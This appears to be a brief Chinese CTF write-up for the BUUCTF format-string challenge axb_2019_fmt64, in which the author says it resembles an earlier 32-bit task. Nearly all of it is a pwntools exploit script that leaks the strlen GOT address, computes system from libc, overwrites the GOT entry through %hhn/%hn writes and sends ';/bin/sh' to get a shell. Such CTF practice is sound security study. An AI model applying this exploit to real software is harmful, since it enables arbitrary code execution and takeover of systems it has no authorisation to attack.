格式化字符串的题目,,,跟32那道有点像,本来用那个工具来着,失败了,,
就是老样子咯
from pwn import*context.log_level='debug'io = process('./axb_2019_fmt64')#io = remote('node4.buuoj.cn',28462)elf = ELF('./axb_2019_fmt64')libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')#libc = ELF("libc-2.23.so")#libc = ELF("./libc-2.2764.so")strlen_got = elf.got['strlen']print(hex(strlen_got))#payload ='aaaaaaaa%8$p'payload ='%9$saaaa'+p64(strlen_got)io.recvuntil('Please tell me:')io.send(payload)strlen_addr=u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00'))print('strlen_addr:'+hex(strlen_addr))system_addr = strlen_addr - libc.sym['strlen']+libc.sym['system']system_low = system_addr&0xffffsystem_high = (system_addr>>16)&0xffprint('low:'+hex(system_low))print('high'+hex(system_high))log.success('system_addr:'+hex(system_addr))io.recvuntil('Please tell me:')payload ='%'+str(system_high-9)+'c%12$hhn%'+str(system_low-system_high)+'c%13$hn'payload =payload.ljust(32,'a')payload +=p64(strlen_got+2)+p64(strlen_got)io.send(payload)io.recvuntil('Please tell me:')io.sendline(';/bin/sh\x00')io.interactive()
若有收获,就点个赞吧
0 人点赞
